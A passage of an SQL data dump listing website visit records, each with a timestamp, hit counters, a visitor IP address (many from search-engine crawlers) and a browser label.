115110,1495885704,2,2,0,0,'108.59.8.70','other'),(115111,1495885737,1,0,1,0,'66.249.76.93',''),(115112,1495885791,1,1,0,0,'46.133.14.130','other'),(115113,1495885934,2,2,0,0,'91.209.11.236','other'),(115114,1495887052,1,0,1,0,'66.249.76.89',''),(115115,1495887415,1,1,0,0,'91.209.11.236','other'),(115116,1495887909,2,0,2,0,'66.249.76.91',''),(115117,1495889261,2,2,0,0,'91.209.11.236','other'),(115118,1495889555,1,0,1,0,'66.249.66.156',''),(115119,1495889700,1,1,0,0,'8.29.198.27','other'),(115120,1495889750,2,0,2,0,'66.249.76.109',''),(115121,1495890546,1,1,0,0,'37.204.82.187','opera'),(115122,1495891068,1,1,0,0,'40.77.167.131','other'),(115123,1495891555,2,1,1,0,'66.249.76.89',''),(115124,1495891560,1,0,1,0,'66.249.76.108',''),(115125,1495893389,2,2,0,0,'91.209.11.236','other'),(115126,1495893724,1,0,1,0,'66.249.76.93',''),(115127,1495893782,1,1,0,0,'217.69.133.215','other'),(115128,1495894177,1,1,0,0,'51.255.65.47','other'),(115129,1495894576,1,1,0,0,'51.255.71.110','other'),(115130,1495894707,1,1,0,0,'37.115.154.200','chrome'),(115131,1495895008,1,0,1,0,'66.249.76.89',''),(115132,1495895018,2,0,2,0,'66.249.66.75',''),(115133,1495895063,1,1,0,0,'157.55.39.71','other'),(115134,1495895277,1,1,0,0,'51.255.65.91','other'),(115135,1495895998,1,1,0,0,'91.209.11.236','other'),(115136,1495896100,1,1,0,0,'164.132.161.62','other'),(115137,1495896247,1,0,1,0,'66.249.66.157',''),(115138,1495896328,1,1,0,0,'164.132.161.84','other'),(115139,1495896645,1,1,0,0,'137.74.201.100','other'),(115140,1495896669,1,0,1,0,'66.249.76.109',''),(115141,1495896810,1,1,0,0,'164.132.161.69','other'),(115142,1495897335,1,1,0,0,'40.77.167.131','other'),(115143,1495897367,2,2,0,0,'91.209.11.236','other'),(115144,1495897399,1,1,0,0,'51.255.65.45','other'),(115145,1495897439,1,0,1,0,'66.249.66.76',''),(115146,1495898236,1,1,0,0,'217.182.132.83','other'),(115147,1495898833,2,0,2,0,'66.249.76.93',''),(115148,1495898875,1,1,0,0,'66.249.66.155','chrome'),(115149,1495898900,1,0,1,0,'66.249.76.91',''),(115150,1495899268,1,1,0,0,'51.255.65.224','other'),(115151,1495899603,1,1,0,0,'91.196.178.36','chrome'),(115152,1495899750,1,1,0,0,'51.255.65.77','other'),(115153,1495899946,1,1,0,0,'157.55.39.135','other'),(115154,1495900065,1,1,0,0,'91.209.11.236','other'),(115155,1495900417,1,1,0,0,'164.132.161.34','other'),(115156,1495900523,1,1,0,0,'8.29.198.25','other'),(115157,1495900662,1,1,0,0,'176.126.162.236','chrome'),(115158,1495900867,1,1,0,0,'180.76.15.13','other'),(115159,1495901090,1,1,0,0,'91.209.11.236','other'),(115160,1495901148,1,0,1,0,'66.249.66.75',''),(115161,1495901163,1,0,1,0,'66.249.76.107',''),(115162,1495901284,1,1,0,0,'51.255.71.100','other'),(115163,1495901714,1,1,0,0,'164.132.161.4','other'),(115164,1495901920,1,1,0,0,'164.132.161.37','other'),(115165,1495901947,1,1,0,0,'217.182.132.72','other'),(115166,1495901967,1,1,0,0,'217.182.132.97','other'),(115167,1495902264,1,1,0,0,'164.132.162.153','other'),(115168,1495902734,1,1,0,0,'51.255.65.35','other'),(115169,1495903416,1,0,1,0,'66.249.66.74',''),(115170,1495903454,1,1,0,0,'51.255.65.12','other'),(115171,1495903579,2,2,0,0,'91.209.11.236','other'),(115172,1495904302,1,1,0,0,'51.255.65.62','other'),(115173,1495904425,1,0,1,0,'66.249.76.109',''),(115174,1495904502,1,1,0,0,'157.55.39.71','other'),(115175,1495904541,1,1,0,0,'137.74.207.108','other'),(115176,1495904584,2,2,0,0,'91.209.11.236','other'),(115177,1495904641,1,1,0,0,'66.249.66.76','chrome'),(115178,1495904739,1,1,0,0,'51.255.65.57','other'),(115179,1495904783,3,3,0,0,'95.158.189.118','other'),(115180,1495905782,1,1,0,0,'91.209.11.236','other'),(115181,1495905847,1,1,0,0,'94.178.147.141','chrome'),(115182,1495906230,1,1,0,0,'40.77.167.131','other'),(115183,1495906427,1,1,0,0,'164.132.161.49','other'),(115184,1495906637,1,1,0,0,'178.154.200.37','other'),(115185,1495906641,1,1,0,0,'87.250.224.8','other'),(115186,1495906813,1,1,0,0,'51.255.65.2','other'),(115187,1495906975,1,1,0,0,'217.182.132.154','other'),(115188,1495907006,1,1,0,0,'51.255.65.37','other'),(115189,1495907510,1,1,0,0,'164.132.161.59','other'),(115190,1495907619,1,1,0,0,'66.249.76.93','chrome'),(115191,1495908498,1,1,0,0,'164.132.161.67','other'),(115192,1495909239,1,1,0,0,'164.132.161.80','other'),(115193,1495909941,1,1,0,0,'51.255.65.51','other'),(115194,1495910494,1,1,0,0,'51.255.71.117','other'),(115195,1495910529,1,1,0,0,'51.255.71.130','other'),(115196,1495910710,1,1,0,0,'217.182.132.7','other'),(115197,1495910952,1,1,0,0,'46.219.254.82','chrome'),(115198,1495911062,1,0,1,0,'66.249.76.93',''),(115199,1495911074,1,0,1,0,'66.249.66.74',''),(115200,1495911090,2,0,2,0,'66.249.76.89',''),(115201,1495911137,1,1,0,0,'164.132.161.29','other'),(115202,1495911351,1,1,0,0,'8.29.198.27','other'),(115203,1495911561,1,0,1,0,'66.249.76.91',''),(115204,1495911723,1,1,0,0,'66.249.93.204','chrome'),(115205,1495911824,1,1,0,0,'95.132.134.60','chrome'),(115206,1495911906,1,1,0,0,'164.132.161.81','other'),(115207,1495911931,1,1,0,0,'157.55.39.152','other'),(115208,1495912504,1,1,0,0,'66.249.66.156','chrome'),(115209,1495912538,1,1,0,0,'91.196.178.72','chrome'),(115210,1495914011,1,1,0,0,'51.255.71.111','other'),(115211,1495915171,1,0,1,0,'66.249.76.109',''),(115212,1495915563,1,1,0,0,'51.255.71.121','other'),(115213,1495915629,1,0,1,0,'66.249.66.157',''),(115214,1495915743,2,2,0,0,'157.55.39.152','other'),(115215,1495915943,1,1,0,0,'217.182.132.77','other'),(115216,1495916282,1,1,0,0,'66.249.66.155','chrome'),(115217,1495917215,1,1,0,0,'217.182.132.171','other'),(115218,1495918027,1,1,0,0,'157.55.39.135','other'),(115219,1495918247,1,1,0,0,'51.255.65.18','other'),(115220,1495918524,1,1,0,0,'51.255.65.23','other'),(115221,1495920022,1,1,0,0,'217.182.132.93','other'),(115222,1495920463,1,1,0,0,'217.182.132.20','other'),(115223,1495921155,1,1,0,0,'164.132.162.187','other'),(115224,1495921479,1,1,0,0,'164.132.161.8','other'),(115225,1495921935,1,0,1,0,'66.249.66.75',''),(115226,1495922074,1,0,1,0,'66.249.66.76',''),(115227,1495922171,1,1,0,0,'8.29.198.27','other'),(115228,1495922276,1,1,0,0,'217.182.132.14','other'),(115229,1495922599,1,1,0,0,'51.255.71.132','other'),(115230,1495922782,1,1,0,0,'66.249.66.157','chrome'),(115231,1495922785,1,0,1,0,'66.249.76.107',''),(115232,1495922857,1,0,1,0,'66.249.76.108',''),(115233,1495922933,1,1,0,0,'217.182.132.147','other'),(115234,1495923037,1,1,0,0,'51.255.65.86','other'),(115235,1495923181,1,0,1,0,'66.249.76.89',''),(115236,1495923192,1,0,1,0,'66.249.66.74',''),(115237,1495923562,1,1,0,0,'217.182.132.173','other'),(115238,1495923642,1,1,0,0,'217.69.133.9','other'),(115239,1495923896,1,1,0,0,'51.255.65.41','other'),(115240,1495924299,1,1,0,0,'217.182.132.59','other'),(115241,1495924500,1,0,1,0,'66.249.76.89',''),(115242,1495924807,1,0,1,0,'66.249.76.91',''),(115243,1495924825,1,1,0,0,'157.55.39.135','other'),(115244,1495925057,1,1,0,0,'164.132.161.18','other'),(115245,1495925629,1,1,0,0,'51.255.65.15','other'),(115246,1495926003,1,1,0,0,'178.154.149.3','other'),(115247,1495926092,1,1,0,0,'217.182.132.16','other'),(115248,1495926248,1,1,0,0,'217.182.132.20','other'),(115249,1495926401,1,1,0,0,'66.249.76.108','chrome'),(115250,1495926476,1,1,0,0,'51.255.65.31','other'),(115251,1495926840,1,0,1,0,'66.249.66.74',''),(115252,1495926844,1,0,1,0,'66.249.76.91',''),(115253,1495926917,1,0,1,0,'66.249.76.89',''),(115254,1495927185,1,1,0,0,'51.255.71.122','other'),(115255,1495928161,1,0,1,0,'66.249.76.91',''),(115256,1495928847,1,0,1,0,'66.249.76.107',''),(115257,1495929211,1,1,0,0,'164.132.161.11','other'),(115258,1495929351,1,1,0,0,'164.132.161.33','other'),(115259,1495929759,1,1,0,0,'66.249.76.108','chrome'),(115260,1495931283,1,0,1,0,'66.249.76.108',''),(115261,1495931301,1,1,0,0,'164.132.161.21','other'),(115262,1495931913,1,1,0,0,'164.132.161.36','other'),(115263,1495932372,1,1,0,0,'164.132.161.5','other'),(115264,1495932449,1,0,1,0,'66.249.66.156',''),(115265,1495932455,1,0,1,0,'66.249.76.91',''),(115266,1495932457,1,0,1,0,'66.249.66.76',''),(115267,1495932499,1,0,1,0,'66.249.66.75',''),(115268,1495932837,1,1,0,0,'66.249.66.156','chrome'),(115269,1495932880,1,1,0,0,'157.55.39.135','other'),(115270,1495932998,1,1,0,0,'8.29.198.27','other'),(115271,1495933065,1,1,0,0,'217.182.132.76','other'),(115272,1495933092,2,0,2,0,'66.249.76.93',''),(115273,1495933189,1,1,0,0,'51.255.65.85','other'),(115274,1495933886,1,0,1,0,'66.249.76.89',''),(115275,1495934194,1,0,1,0,'66.249.66.156',''),(115276,1495934588,1,1,0,0,'51.255.65.78','other'),(115277,1495935531,1,1,0,0,'66.249.66.156','chrome'),(115278,1495935661,1,1,0,0,'164.132.161.18','other'),(115279,1495935938,1,0,1,0,'66.249.76.107',''),(115280,1495936013,1,1,0,0,'51.255.65.59','other'),(115281,1495936057,1,1,0,0,'217.182.132.56','other'),(115282,1495936138,1,1,0,0,'164.132.161.73','other'),(115283,1495936694,1,1,0,0,'157.55.39.166','other'),(115284,1495937346,1,1,0,0,'51.255.65.68','other'),(115285,1495937992,1,1,0,0,'164.132.161.77','other'),(115286,1495938305,1,1,0,0,'180.76.15.146','other'),(115287,1495938449,1,1,0,0,'217.182.132.172','other'),(115288,1495938773,1,0,1,0,'66.249.76.93',''),(115289,1495939595,1,1,0,0,'217.182.132.59','other'),(115290,1495939958,1,1,0,0,'217.182.132.185','other'),(115291,1495939981,1,1,0,0,'66.249.76.107','chrome'),(115292,1495940176,1,1,0,0,'51.255.71.123','other'),(115293,1495940369,1,0,1,0,'66.249.66.155',''),(115294,1495940575,1,1,0,0,'51.255.65.96','other'),(115295,1495941533,1,0,1,0,'66.249.76.109',''),(115296,1495941743,1,1,0,0,'157.55.39.152','other'),(115297,1495941956,1,1,0,0,'51.255.65.32','other'),(115298,1495942873,1,1,0,0,'95.28.227.114','msie'),(115299,1495943076,1,1,0,0,'91.209.11.236','other'),(115300,1495943599,1,1,0,0,'164.132.161.45','other'),(115301,1495943836,1,1,0,0,'8.29.198.26','other'),(115302,1495943950,1,1,0,0,'51.255.65.57','other'),(115303,1495943963,1,1,0,0,'164.132.161.95','other'),(115304,1495944163,1,1,0,0,'137.74.207.114','other'),(115305,1495944239,1,1,0,0,'51.255.71.116','other'),(115306,1495944301,1,1,0,0,'217.182.132.177','other'),(115307,1495944585,2,1,1,0,'66.249.76.109',''),(115308,1495944724,1,0,1,0,'66.249.76.93',''),(115309,1495944734,3,0,3,0,'66.249.76.89',''),(115310,1495944999,1,1,0,0,'95.27.168.186','chrome'),(115311,1495945338,1,0,1,0,'66.249.66.74',''),(115312,1495945576,1,1,0,0,'51.255.65.19','other'),(115313,1495946215,1,1,0,0,'217.182.132.149','other'),(115314,1495946374,1,1,0,0,'51.255.65.93','other'),(115315,1495946388,1,1,0,0,'180.76.15.151','other'),(115316,1495946473,1,1,0,0,'51.255.65.26','other'),(115317,1495946827,1,1,0,0,'176.193.107.173','msie'),(115318,1495946933,1,1,0,0,'91.196.178.35','chrome'),(115319,1495946965,1,1,0,0,'95.108.179.15','other'),(115320,1495947435,1,1,0,0,'109.236.90.154','chrome'),(115321,1495947535,1,1,0,0,'40.77.167.131','other'),(115322,1495947760,1,0,1,0,'66.249.66.157',''),(115323,1495948436,1,0,1,0,'66.249.76.93',''),(115324,1495948530,1,1,0,0,'51.255.65.56','other'),(115325,1495948599,2,2,0,0,'157.55.39.166','other'),(115326,1495948810,1,1,0,0,'95.28.193.224','msie'),(115327,1495948836,1,1,0,0,'66.249.76.91','chrome'),(115328,1495948986,1,0,1,0,'66.249.76.108',''),(115329,1495948990,1,1,0,0,'95.220.22.155','msie'),(115330,1495949079,1,1,0,0,'157.55.39.135','other'),(115331,1495949165,1,1,0,0,'66.249.66.157','chrome'),(115332,1495949234,1,1,0,0,'109.236.90.154','chrome'),(115333,1495949315,1,1,0,0,'217.182.132.74','other'),(115334,1495949578,1,1,0,0,'217.182.132.4','other'),(115335,1495950531,1,1,0,0,'164.132.161.81','other'),(115336,1495950977,1,1,0,0,'217.182.132.33','other'),(115337,1495951046,1,1,0,0,'91.209.11.236','other'),(115338,1495951759,1,1,0,0,'164.132.162.153','other'),(115339,1495951766,1,1,0,0,'217.182.132.154','other'),(115340,1495951836,1,0,1,0,'66.249.66.75',''),(115341,1495951934,3,3,0,0,'69.30.211.2','other'),(115342,1495952675,1,0,1,0,'66.249.76.91',''),(115343,1495953407,1,0,1,0,'66.249.66.75',''),(115344,1495953567,1,1,0,0,'66.249.66.157','chrome'),(115345,1495953733,1,1,0,0,'51.255.65.23','other'),(115346,1495954052,1,1,0,0,'51.255.71.126','other'),(115347,1495954657,1,1,0,0,'8.29.198.25','other'),(115348,1495955108,1,0,1,0,'66.249.76.108',''),(115349,1495955140,1,1,0,0,'137.74.203.194','other'),(115350,1495955455,1,0,1,0,'66.249.76.109',''),(115351,1495956049,1,1,0,0,'164.132.161.69','other'),(115352,1495956346,1,0,1,0,'66.249.76.91',''),(115353,1495956666,1,1,0,0,'217.182.132.37','other'),(115354,1495957395,1,1,0,0,'178.95.244.222','firefox'),(115355,1495957504,1,0,1,0,'66.249.76.109',''),(115356,1495957722,1,0,1,0,'66.249.66.75',''),(115357,1495957803,1,1,0,0,'95.108.179.21','other'),(115358,1495957807,1,1,0,0,'178.154.189.16','other'),(115359,1495958059,2,2,0,0,'51.255.65.26','other'),(115360,1495958898,1,1,0,0,'51.255.65.19','other'),(115361,1495959207,1,1,0,0,'51.255.71.123','other'),(115362,1495959269,1,0,1,0,'66.249.66.75',''),(115363,1495959270,1,1,0,0,'157.55.39.135','other'),(115364,1495959877,1,1,0,0,'217.182.132.152','other'),(115365,1495961008,1,1,0,0,'217.182.132.188','other'),(115366,1495961034,1,1,0,0,'217.182.132.181','other'),(115367,1495961180,1,1,0,0,'51.255.65.74','other'),(115368,1495961683,1,1,0,0,'40.77.167.131','other'),(115369,1495962435,1,0,1,0,'66.249.76.89',''),(115370,1495962480,1,1,0,0,'164.132.161.6','other'),(115371,1495962524,1,1,0,0,'137.74.207.159','other'),(115372,1495962745,1,1,0,0,'51.255.71.127','other'),(115373,1495962878,1,1,0,0,'54.165.59.7','other'),(115374,1495962906,1,1,0,0,'213.179.252.1','chrome'),(115375,1495963795,1,0,1,0,'66.249.76.109',''),(115376,1495963942,1,0,1,0,'66.249.76.107',''),(115377,1495963975,1,1,0,0,'95.221.206.165','msie'),(115378,1495964193,1,0,1,0,'66.249.76.93',''),(115379,1495965018,1,1,0,0,'176.193.107.173','msie'),(115380,1495965042,1,1,0,0,'51.255.65.87','other'),(115381,1495965154,1,1,0,0,'178.140.32.57','opera'),(115382,1495965482,1,1,0,0,'8.29.198.26','other'),(115383,1495965915,1,0,1,0,'66.249.64.155',''),(115384,1495966066,1,0,1,0,'66.249.76.91',''),(115385,1495966068,1,0,1,0,'66.249.66.75',''),(115386,1495966108,1,0,1,0,'66.249.66.74',''),(115387,1495966165,1,1,0,0,'164.132.161.9','other'),(115388,1495966215,1,1,0,0,'66.249.66.155','chrome'),(115389,1495966712,2,2,0,0,'62.212.73.211','other'),(115390,1495966881,1,1,0,0,'95.221.56.159','msie'),(115391,1495967524,1,1,0,0,'51.255.65.79','other'),(115392,1495967785,1,0,1,0,'66.249.66.76',''),(115393,1495968633,1,1,0,0,'66.102.9.136','chrome'),(115394,1495968660,1,1,0,0,'109.236.81.202','msie'),(115395,1495969987,1,1,0,0,'51.255.65.16','other'),(115396,1495970216,1,1,0,0,'164.132.161.2','other'),(115397,1495971174,1,1,0,0,'217.182.132.27','other'),(115398,1495971307,1,1,0,0,'217.182.132.90','other'),(115399,1495971431,1,0,1,0,'66.249.76.89',''),(115400,1495971677,1,1,0,0,'46.200.62.179','chrome'),(115401,1495971905,1,1,0,0,'217.182.132.148','other'),(115402,1495972134,1,1,0,0,'51.255.65.94','other'),(115403,1495972243,1,0,1,0,'66.249.66.157',''),(115404,1495972441,1,1,0,0,'217.182.132.191','other'),(115405,1495972646,1,1,0,0,'137.74.207.109','other'),(115406,1495972659,1,1,0,0,'51.255.65.26','other'),(115407,1495972862,1,1,0,0,'66.249.93.205','chrome'),(115408,1495973210,1,0,1,0,'66.249.76.93',''),(115409,1495973689,1,1,0,0,'46.241.7.137','msie'),(115410,1495974118,1,1,0,0,'66.249.66.76','chrome'),(115411,1495974475,1,1,0,0,'91.196.178.161','chrome'),(115412,1495974728,1,1,0,0,'109.236.81.202','msie'),(115413,1495974786,1,1,0,0,'137.74.207.108','other'),(115414,1495974803,2,2,0,0,'91.209.11.236','other'),(115415,1495975337,1,1,0,0,'188.244.33.208','msie'),(115416,1495976252,5,5,0,0,'173.208.244.82','other'),(115417,1495976305,1,1,0,0,'8.29.198.27','other'),(115418,1495976922,1,1,0,0,'51.255.71.122','other'),(115419,1495977323,1,1,0,0,'217.182.132.240','other'),(115420,1495977631,1,1,0,0,'51.255.65.29','other'),(115421,1495977844,1,1,0,0,'178.154.200.45','other'),(115422,1495978027,1,1,0,0,'51.255.71.116','other'),(115423,1495978748,1,1,0,0,'137.74.207.101','other'),(115424,1495978806,1,1,0,0,'51.255.65.2','other'),(115425,1495979377,1,1,0,0,'217.182.132.181','other'),(115426,1495979654,1,0,1,0,'66.249.76.93',''),(115427,1495979663,1,1,0,0,'164.132.161.92','other'),(115428,1495979693,1,1,0,0,'5.165.255.122','msie'),(115429,1495980201,1,0,1,0,'68.180.230.48',''),(115430,1495981164,1,1,0,0,'66.102.9.27','chrome'),(115431,1495981288,1,1,0,0,'217.182.132.15','other'),(115432,1495981412,1,1,0,0,'164.132.161.73','other'),(115433,1495981762,1,0,1,0,'66.249.66.157',''),(115434,1495982278,1,1,0,0,'51.255.71.111','other'),(115435,1495982380,1,1,0,0,'66.249.76.107','chrome'),(115436,1495982944,1,0,1,0,'66.249.76.109',''),(115437,1495983146,1,1,0,0,'137.74.207.164','other'),(115438,1495983232,1,1,0,0,'5.164.66.35','msie'),(115439,1495983753,1,1,0,0,'91.196.178.168','chrome'),(115440,1495983777,1,1,0,0,'157.55.39.152','other'),(115441,1495983904,1,0,1,0,'66.249.66.155',''),(115442,1495984012,1,0,1,0,'66.249.66.157',''),(115443,1495984158,1,1,0,0,'180.76.15.9','other'),(115444,1495984190,1,1,0,0,'51.255.65.32','other'),(115445,1495984501,1,0,1,0,'66.249.76.91',''),(115446,1495985603,1,1,0,0,'51.255.71.128','other'),(115447,1495986160,1,1,0,0,'91.196.178.168','chrome'),(115448,1495986265,1,1,0,0,'217.182.132.96','other'),(115449,1495987020,1,1,0,0,'164.132.161.42','other'),(115450,1495987141,1,1,0,0,'8.29.198.25','other'),(115451,1495987330,1,1,0,0,'164.132.161.46','other'),(115452,1495987463,1,1,0,0,'217.182.132.37','other'),(115453,1495987495,1,1,0,0,'157.55.39.152','other'),(115454,1495987851,1,0,1,0,'66.249.76.109',''),(115455,1495988183,2,1,1,0,'66.249.76.107',''),(115456,1495988193,1,1,0,0,'188.138.17.240','other'),(115457,1495989095,1,1,0,0,'188.138.17.240','other'),(115458,1495989125,2,2,0,0,'164.132.161.62','other'),(115459,1495989300,1,1,0,0,'217.182.132.94','other'),(115460,1495989463,1,1,0,0,'137.74.207.170','other'),(115461,1495989590,1,1,0,0,'91.196.178.36','chrome'),(115462,1495989634,1,0,1,0,'66.249.76.109',''),(115463,1495990107,1,1,0,0,'217.182.132.14','other'),(115464,1495990112,1,0,1,0,'66.249.76.107',''),(115465,1495990852,1,1,0,0,'91.196.178.168','chrome'),(115466,1495990891,1,1,0,0,'217.182.132.70','other'),(115467,1495991058,1,1,0,0,'164.132.161.93','other'),(115468,1495991131,1,1,0,0,'217.182.132.95','other'),(115469,1495991134,1,1,0,0,'157.55.39.135','other'),(115470,1495991231,1,1,0,0,'157.55.39.166','other'),(115471,1495991649,1,1,0,0,'164.132.161.37','other'),(115472,1495991679,1,1,0,0,'66.249.76.109','chrome'),(115473,1495991746,1,1,0,0,'217.182.132.15','other'),(115474,1495991824,1,1,0,0,'5.255.253.31','other'),(115475,1495991898,1,1,0,0,'51.255.65.26','other'),(115476,1495992152,1,1,0,0,'5.165.255.122','msie'),(115477,1495992228,1,1,0,0,'91.196.178.168','chrome'),(115478,1495992296,1,1,0,0,'51.255.65.70','other'),(115479,1495993915,1,1,0,0,'164.132.161.84','other'),(115480,1495994191,1,1,0,0,'164.132.161.25','other'),(115481,1495994202,1,1,0,0,'109.236.81.202','msie'),(115482,1495994321,1,0,1,0,'68.180.230.48',''),(115483,1495994339,1,0,1,0,'66.249.76.93',''),(115484,1495994447,1,1,0,0,'51.255.65.40','other'),(115485,1495994481,1,1,0,0,'164.132.161.27','other'),(115486,1495994522,1,0,1,0,'66.249.76.107',''),(115487,1495994600,1,1,0,0,'157.55.39.166','other'),(115488,1495994632,1,1,0,0,'217.182.132.154','other'),(115489,1495994847,1,1,0,0,'217.182.132.91','other'),(115490,1495995515,1,1,0,0,'164.132.161.38','other'),(115491,1495995531,1,1,0,0,'164.132.162.158','other'),(115492,1495995636,1,1,0,0,'51.255.65.12','other'),(115493,1495995717,1,0,1,0,'66.249.76.108',''),(115494,1495996233,1,1,0,0,'180.76.15.32','other'),(115495,1495996375,1,1,0,0,'46.211.145.25','chrome'),(115496,1495996485,1,1,0,0,'137.74.201.100','other'),(115497,1495996733,1,1,0,0,'157.55.39.166','other'),(115498,1495996955,1,1,0,0,'51.255.65.74','other'),(115499,1495997268,1,1,0,0,'164.132.161.31','other'),(115500,1495997332,1,1,0,0,'164.132.161.55','other'),(115501,1495997961,1,1,0,0,'8.29.198.25','other'),(115502,1495998291,1,1,0,0,'51.255.65.12','other'),(115503,1495998607,1,1,0,0,'178.154.200.45','other'),(115504,1495998838,1,1,0,0,'66.249.76.89','chrome'),(115505,1495998932,1,1,0,0,'164.132.161.69','other'),(115506,1495998990,1,0,1,0,'66.249.76.109',''),(115507,1495999303,1,0,1,0,'66.249.66.156',''),(115508,1495999546,1,1,0,0,'51.255.65.97','other'),(115509,1495999687,1,1,0,0,'157.55.39.166','other'),(115510,1495999729,1,0,1,0,'66.249.76.107',''),(115511,1495999753,1,1,0,0,'217.182.132.21','other'),(115512,1495999872,1,1,0,0,'137.74.201.100','other'),(115513,1496000464,1,0,1,0,'66.249.66.75',''),(115514,1496000659,1,0,1,0,'66.249.66.156',''),(115515,1496001317,1,1,0,0,'207.46.13.67','other'),(115516,1496001489,1,1,0,0,'217.182.132.15','other'),(115517,1496001547,1,1,0,0,'217.182.132.178','other'),(115518,1496001600,1,1,0,0,'51.255.71.126','other'),(115519,1496001950,1,1,0,0,'51.255.65.86','other'),(115520,1496002717,1,1,0,0,'51.255.71.127','other'),(115521,1496002753,1,0,1,0,'66.249.76.108',''),(115522,1496002778,1,1,0,0,'164.132.161.22','other'),(115523,1496002878,1,1,0,0,'217.182.132.81','other'),(115524,1496002918,1,1,0,0,'51.255.65.14','other'),(115525,1496003908,1,0,1,0,'66.249.66.157',''),(115526,1496004231,1,0,1,0,'66.249.76.91',''),(115527,1496005432,1,1,0,0,'164.132.161.88','other'),(115528,1496005529,1,1,0,0,'51.255.65.53','other'),(115529,1496006301,1,1,0,0,'51.255.65.58','other'),(115530,1496006507,1,0,1,0,'66.249.76.93',''),(115531,1496006534,1,0,1,0,'66.249.76.89',''),(115532,1496006541,2,0,2,0,'66.249.76.91',''),(115533,1496007118,1,1,0,0,'164.132.161.55','other'),(115534,1496007223,1,1,0,0,'51.255.71.117','other'),(115535,1496007327,2,2,0,0,'217.182.132.58','other'),(115536,1496007717,1,1,0,0,'180.76.15.33','other'),(115537,1496007940,1,1,0,0,'164.132.161.81','other'),(115538,1496008778,1,1,0,0,'8.29.198.25','other'),(115539,1496009213,1,1,0,0,'51.255.65.224','other'),(115540,1496009357,1,0,1,0,'68.180.230.48',''),(115541,1496009580,1,1,0,0,'51.255.65.40','other'),(115542,1496010142,1,1,0,0,'137.74.207.161','other'),(115543,1496010902,1,1,0,0,'95.28.227.114','msie'),(115544,1496011215,1,1,0,0,'5.165.255.122','msie'),(115545,1496011584,1,1,0,0,'37.204.152.138','msie'),(115546,1496012110,1,1,0,0,'217.182.132.54','other'),(115547,1496012394,1,1,0,0,'77.41.113.93','msie'),(115548,1496012602,1,1,0,0,'46.242.65.100','msie'),(115549,1496012774,1,1,0,0,'164.132.162.156','other'),(115550,1496013192,11,11,0,0,'208.43.225.84','other'),(115551,1496013202,13,13,0,0,'208.43.225.85','other'),(115552,1496013558,1,1,0,0,'51.255.65.60','other'),(115553,1496013585,1,1,0,0,'164.132.161.11','other'),(115554,1496013760,1,1,0,0,'51.255.65.25','other'),(115555,1496014095,1,1,0,0,'51.255.65.28','other'),(115556,1496014097,1,1,0,0,'66.249.66.157','chrome'),(115557,1496014408,1,1,0,0,'164.132.161.15','other'),(115558,1496015709,1,1,0,0,'51.255.65.58','other'),(115559,1496015821,1,1,0,0,'51.255.65.36','other'),(115560,1496015831,1,1,0,0,'141.8.132.50','other'),(115561,1496015835,1,1,0,0,'178.154.189.16','other'),(115562,1496016032,1,1,0,0,'51.255.64.106','other'),(115563,1496016358,1,1,0,0,'164.132.161.29','other'),(115564,1496016576,2,2,0,0,'95.213.141.126','opera'),(115565,1496017184,1,0,1,0,'66.249.76.93',''),(115566,1496017218,1,0,1,0,'66.249.76.89',''),(115567,1496017233,1,0,1,0,'66.249.66.75',''),(115568,1496017466,1,0,1,0,'66.249.66.76',''),(115569,1496017779,1,1,0,0,'51.255.65.19','other'),(115570,1496018131,1,1,0,0,'95.108.213.32','other'),(115571,1496018428,1,1,0,0,'51.255.65.65','other'),(115572,1496018518,1,1,0,0,'95.28.227.114','msie'),(115573,1496018771,1,0,1,0,'66.249.76.93',''),(115574,1496018817,1,1,0,0,'87.250.224.7','other'),(115575,1496019148,1,1,0,0,'164.132.161.87','other'),(115576,1496019179,1,1,0,0,'217.182.132.17','other'),(115577,1496019190,2,2,0,0,'217.182.132.32','other'),(115578,1496019236,1,1,0,0,'51.255.65.56','other'),(115579,1496019447,1,1,0,0,'176.193.111.247','msie'),(115580,1496019573,1,1,0,0,'164.132.161.67','other'),(115581,1496019602,1,1,0,0,'8.29.198.27','other'),(115582,1496019685,1,1,0,0,'164.132.164.180','other'),(115583,1496020000,1,0,1,0,'66.249.66.155',''),(115584,1496020024,1,1,0,0,'217.182.132.52','other'),(115585,1496020204,1,1,0,0,'204.79.180.249','msie'),(115586,1496020453,1,1,0,0,'95.221.53.51','msie'),(115587,1496020495,1,1,0,0,'217.182.132.157','other'),(115588,1496020661,1,1,0,0,'95.221.56.159','msie'),(115589,1496020783,1,1,0,0,'164.132.161.65','other'),(115590,1496021108,1,1,0,0,'217.182.132.155','other'),(115591,1496021138,1,1,0,0,'157.55.39.166','other'),(115592,1496021393,1,0,1,0,'66.249.76.89',''),(115593,1496021406,1,1,0,0,'217.182.132.240','other'),(115594,1496022151,1,1,0,0,'157.55.39.166','other'),(115595,1496022342,1,1,0,0,'66.249.76.108','chrome'),(115596,1496022499,1,1,0,0,'51.255.65.26','other'),(115597,1496022592,1,0,1,0,'66.249.76.93',''),(115598,1496022789,1,1,0,0,'217.182.132.52','other'),(115599,1496022899,1,0,1,0,'66.249.66.76',''),(115600,1496022948,1,1,0,0,'5.167.114.101','msie'),(115601,1496023462,1,0,1,0,'66.249.76.89',''),(115602,1496023671,1,1,0,0,'164.132.162.157','other'),(115603,1496023779,1,1,0,0,'176.31.231.10','other'),(115604,1496023854,1,1,0,0,'164.132.161.28','other'),(115605,1496023965,1,1,0,0,'51.255.65.65','other'),(115606,1496023998,1,0,1,0,'68.180.230.48',''),(115607,1496025307,1,1,0,0,'51.255.71.133','other'),(115608,1496025326,1,1,0,0,'95.108.213.34','other'),(115609,1496025473,1,1,0,0,'66.249.76.93','chrome'),(115610,1496025638,1,1,0,0,'180.76.15.22','other'),(115611,1496026711,1,1,0,0,'164.132.161.5','other'),(115612,1496026875,1,1,0,0,'217.182.132.154','other'),(115613,1496026889,1,1,0,0,'137.74.207.161','other'),(115614,1496026928,1,0,1,0,'66.249.66.155',''),(115615,1496027010,1,1,0,0,'217.182.132.71','other'),(115616,1496027142,1,0,1,0,'66.249.76.93',''),(115617,1496027916,1,1,0,0,'51.255.65.12','other'),(115618,1496028027,1,1,0,0,'66.249.76.109','chrome'),(115619,1496028099,1,1,0,0,'137.74.201.99','other'),(115620,1496028164,1,1,0,0,'217.182.132.16','other'),(115621,1496028348,1,1,0,0,'164.132.161.47','other'),(115622,1496028456,1,1,0,0,'51.255.65.60','other'),(115623,1496028936,1,1,0,0,'217.182.132.70','other'),(115624,1496029220,1,1,0,0,'82.145.223.19','other'),(115625,1496029401,1,1,0,0,'217.182.132.52','other'),(115626,1496029560,1,1,0,0,'51.255.65.14','other'),(